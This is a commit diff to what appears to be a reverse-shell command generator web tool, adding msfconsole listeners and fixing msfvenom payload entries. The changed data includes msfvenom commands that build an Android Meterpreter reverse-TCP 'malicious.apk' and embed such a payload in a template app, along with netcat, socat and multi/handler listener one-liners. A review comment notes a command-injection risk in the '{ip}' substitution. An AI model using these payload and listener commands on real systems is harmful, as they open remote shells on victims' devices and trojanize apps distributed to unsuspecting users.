Merge pull request #37 from epi052/msfconsole-listeners

added msfconsole listeners; minor bugfixes for msf payloads
Ryan Montgomery 2021-04-05 11:06:02 -04:00 committed by GitHub
commit 2e982aa1fd
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2 changed files with 22 additions and 3 deletions


@ -327,12 +327,12 @@ const msfvenomCommands = withCommandType(
}, },
{ {
"name": "Android Meterpreter Reverse TCP", "name": "Android Meterpreter Reverse TCP",
"command": "msfvenom -a x64 --platform android p android/meterpreter/reverse_tcp lhost={ip} lport={port} R -o malicious.apk", "command": "msfvenom -a x64 --platform android -p android/meterpreter/reverse_tcp lhost={ip} lport={port} R -o malicious.apk",
"meta": ["msfvenom", "android", "android", "reverse"] "meta": ["msfvenom", "android", "android", "reverse"]
}, },
{ {
"name": "Android Meterpreter Embed Reverse TCP", "name": "Android Meterpreter Embed Reverse TCP",
"command": "msfvenom -a x64 --platform android -x <app.apk> android/meterpreter/reverse_tcp lhost={ip} lport={port} -o payload.apk", "command": "msfvenom -a x64 --platform android -x template-app.apk -p android/meterpreter/reverse_tcp lhost={ip} lport={port} -o payload.apk",
"meta": ["msfvenom", "android", "android", "reverse"] "meta": ["msfvenom", "android", "android", "reverse"]
}, },
{ {
@ -357,7 +357,8 @@ const rsgData = {
['windows ConPty', 'stty raw -echo; (stty size; cat) | nc -lvnp {port}'], ['windows ConPty', 'stty raw -echo; (stty size; cat) | nc -lvnp {port}'],
['socat', 'socat -d -d TCP-LISTEN:{port} STDOUT'], ['socat', 'socat -d -d TCP-LISTEN:{port} STDOUT'],
['socat (TTY)', 'socat -d -d file:`tty`,raw,echo=0 TCP-LISTEN:{port}'], ['socat (TTY)', 'socat -d -d file:`tty`,raw,echo=0 TCP-LISTEN:{port}'],
['powercat', 'powercat -l -p {port}'] ['powercat', 'powercat -l -p {port}'],
['msfconsole', 'msfconsole -q -x "use multi/handler; set payload {payload}; set lhost {ip}; set lport {port}; exploit"']
], ],
shells: ['sh', '/bin/sh', 'bash', '/bin/bash', 'cmd', 'powershell', 'ash', 'bsh', 'csh', 'ksh', 'zsh', 'pdksh', 'tcsh'], shells: ['sh', '/bin/sh', 'bash', '/bin/bash', 'cmd', 'powershell', 'ash', 'bsh', 'csh', 'ksh', 'zsh', 'pdksh', 'tcsh'],
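Review bot: The new `msfconsole` listener entry places `{ip}` and `{payload}` inside the double-quoted `-x "..."` argument, and nothing visible in this change constrains the address that is substituted there. `{payload}` is limited by the `[a-zA-Z0-9/_]+` capture in `getPayload`, but `{ip}` comes from `rsg.getIP()`, which presumably returns the stored or typed value unchanged, so a value containing `"` or `;` would alter the command line the user copies into their own shell. I would validate the address before the `command.replace('{ip}', ...)` call in the other file, for example `if (!/^[A-Za-z0-9.:_-]+$/.test(rsg.getIP())) return;`, and add a comment on this entry such as `// {ip} and {payload} end up inside a quoted -x string: values must not contain quotes or semicolons`. Whether the finished command is written to the page as HTML is not visible in these hunks; if it is, the same values should be escaped before display.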


@ -80,6 +80,7 @@
const rsg = { const rsg = {
ip: localStorage.getItem('ip') || '10.10.10.10', ip: localStorage.getItem('ip') || '10.10.10.10',
port: localStorage.getItem('port') || 9001, port: localStorage.getItem('port') || 9001,
payload: localStorage.getItem('payload') || 'windows/x64/meterpreter/reverse_tcp',
shell: localStorage.getItem('shell') || rsgData.shells[0], shell: localStorage.getItem('shell') || rsgData.shells[0],
listener: localStorage.getItem('listener') || rsgData.listenerCommands[0][1], listener: localStorage.getItem('listener') || rsgData.listenerCommands[0][1],
encoding: localStorage.getItem('encoding') || 'None', encoding: localStorage.getItem('encoding') || 'None',
@ -137,6 +138,21 @@
return reverseShellData.command; return reverseShellData.command;
}, },
getPayload: () => {
if (rsg.commandType === 'MSFVenom') {
let cmd = rsg.getReverseShellCommand();
// msfvenom -p windows/x64/meterpreter_reverse_tcp ...
let regex = /\s+-p\s+(?<payload>[a-zA-Z0-9/_]+)/;
let match = regex.exec(cmd);
if (match) {
return match.groups.payload;
}
}
return 'windows/x64/meterpreter/reverse_tcp'
},
generateReverseShellCommand: () => { generateReverseShellCommand: () => {
let command let command
@ -306,6 +322,8 @@
let command = listenerSelect.value; let command = listenerSelect.value;
command = rsg.highlightParameters(command) command = rsg.highlightParameters(command)
command = command.replace('{port}', rsg.getPort()) command = command.replace('{port}', rsg.getPort())
command = command.replace('{ip}', rsg.getIP())
command = command.replace('{payload}', rsg.getPayload())
if (rsg.getPort() < 1024) { if (rsg.getPort() < 1024) {
privilegeWarning.style.visibility = "visible"; privilegeWarning.style.visibility = "visible";